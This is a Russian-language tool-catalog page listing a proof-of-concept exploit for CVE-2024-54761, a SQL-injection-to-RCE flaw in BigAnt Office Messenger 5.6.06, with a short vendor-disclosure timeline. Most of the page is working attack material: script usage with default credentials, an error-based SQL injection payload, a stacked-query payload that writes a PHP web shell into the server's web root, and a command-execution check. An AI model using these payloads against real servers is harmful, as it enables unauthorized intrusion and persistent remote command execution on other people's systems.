Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-54761 — PoC для CVE-2024-54761 | Kitploit
Инструменты/GitHubGitHub/nscan9/cve-2024-54761
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnscan9/cve-2024-54761

CVE-2024-54761

PoC для CVE-2024-54761

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

BigAnt Office Messenger 5.6.06 RCE через SQL-инъекцию

Уязвимость SQL-инъекции в BigAnt Messenger приводит к уязвимости RCE. Следуйте шагам для эксплуатации.

Usage:

CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            показать это справочное сообщение и выйти
  -r, --rhost RHOST     IP-адрес цели
  -p, --rport RPORT     Порт цели (по умолчанию 8000)
  -u, --username USERNAME
                        Имя пользователя для входа (по умолчанию admin)
  -P, --password PASSWORD
                        Пароль для входа (по умолчанию 123456)

Запустите эксплойт с учётными данными по умолчанию.

python CVE-2024-54761.py -r 127.0.0.1
Эксплойт

Ручная эксплуатация

Извлеките версию базы данных с помощью параметра dev_code, подверженного SQLi.

# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

Версия SQLI Загрузите PHP-веб-шелл на цель с помощью стековых запросов SQL.

# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

создание веб-шелла 1 Подтверждение выполнения команды:

/shell.php?cmd=whoami

whoami команда dir

Хронология

31-10-2024: Отправлены уязвимости вендору по электронной почте

31-10-2024: Направлено письмо вендору, ответа не получено

15-11-2024: Направлено письмо вендору, ответа не получено

15-11-2024: Запрошены CVE

Ссылки

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

Скачать инструмент